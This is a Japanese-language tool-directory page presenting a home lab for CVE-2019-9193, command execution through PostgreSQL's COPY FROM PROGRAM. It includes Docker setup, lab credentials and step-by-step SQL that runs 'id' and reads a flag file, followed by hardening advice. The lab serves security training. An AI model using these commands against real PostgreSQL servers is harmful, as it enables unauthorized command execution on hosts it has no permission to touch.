Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-9193-Home-Lab — このラボは、CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE をシミュレートします。 | Kitploit
ツール/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
脆弱性分析エクスプロイトペネトレーションテスト学習と教育データベースセキュリティラボと実践
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

このラボは、CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE をシミュレートします。

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-9193 — PostgreSQL の COPY FROM PROGRAM による RCE

CVE20199193-2

このラボは、PostgreSQL 9.3〜11.2 に存在する脆弱性 CVE-2019-9193 を再現します。superuser または pg_execute_server_program ロールを持つユーザーが実行すると、次のコマンドで OS コマンドを実行できます:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

このラボの課題は、この機能を悪用して次のファイルを読み取ることです:

root@kitploit:~
/tmp/flag.txt

目的

  1. PostgreSQL に接続する:
    • ユーザー: postgres
    • パスワード: sentinel7
    • ホストポート: 5433
  2. COPY FROM PROGRAM を使用して次の操作を行います:
    • OS コマンドを実行する
    • フラグを取得する

セットアップ

root@kitploit:~
docker compose build
docker compose up -d

次のコマンドで接続します:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

攻撃手順

1) テーブルを作成する

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) RCE をテストする

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) フラグを読み取る

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

セキュリティ上の注意点

  • PostgreSQL の superuser でアプリケーションを実行しない
  • pg_execute_server_program を不必要に付与しない
  • COPY PROGRAM を無効化または制限する
  • SQL インジェクションに対してアプリケーションを堅牢化する
ツールをダウンロード